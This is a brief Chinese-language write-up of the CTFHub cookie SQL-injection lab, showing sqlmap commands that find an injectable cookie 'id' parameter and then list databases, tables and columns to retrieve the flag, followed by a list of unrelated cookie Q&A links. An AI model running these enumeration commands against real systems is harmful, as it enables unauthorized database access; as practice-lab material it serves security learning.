CTFHub-Cookie注入-wp

热度：101 发布时间：2023-11-15 10:06:18.0

Cookie注入

sqlmap

设置代理，使用BurpSuite进行截断，并复制出Request信息，放置于txt文件中
使用
```
python sqlmap.py -r 123.txt --level=2
```
进行扫描

在这里插入图片描述

? 发现存在Cookie中id参数的注入漏洞

使用
```
python sqlmap.py -u "..." --dbs
```
爆出数据库名

python sqlmap.py -u "..." -D sqli -tables

爆出表名

python sqlmap.py -u "..." -D sqli -T pmawelsyuy --columns

爆出表结构
在这里插入图片描述

拿到flag

在这里插入图片描述

查看全文

相关解决方案

为啥session id 是保存在客户端的 cookie 里的啊
java EL Cookie 有关问题
cookie 在liunx上获取不到
jsp cookie 封存密码用浏览器清除cookie 后再刷新发先cookie不空
cookie 如何保存和获取剩余时间
ASP的7个对象Session、Application、Cookie、Response、Request、Server不知是什么意思，经常混，如何用，多谢
session 和 cookie 的有关问题
Session Cookie without Secure flag set,该怎么解决
Application/Session/ViewState/Cache/cookie 这几个对象可以存储的最大长度是多少，默认是多少？解决方案
asp.net cookie 中文乱码解决方法
高分放送-求asp.net cookie 中文乱码有关问题
菜鸟问一下 Cookie 和Session的有关问题
cookie 为什么总也不过期解决方法
请问 cookie 跨域有关问题
请问：cookie 紧急有关问题
郁闷死了,登陆有关问题. cookie
告诉小弟我什么原因 COOKIE 有关问题
如果不设置 COOKIE 有效时间。那么他将与浏览器一直存在，除非关闭浏览器才失效？解决思路
form 认证 cookie 永久保留有关问题
解释一下jquery.cookie 属性解决思路
请问Javascript专家，怎么翻译：messing around with cookie
cookie 鍜宻ession 鐨勫尯鍒??瑙
jsp cookie
jquery.cookie 在事件中无效,该如何解决
IE 火狐狸谷歌缓存 cookie
cookie 实现一个IP一天投5次票，以下代码小弟我写的是只投一次求高手修改
Htmlunit / HttpClient 报 Cookie rejected 警告的解决方案
对象不支持此属性或方法: 'Request.Cookie'解决办法
COOKIE 保存域有关问题
cookie session都过时了，现在是HTML5年代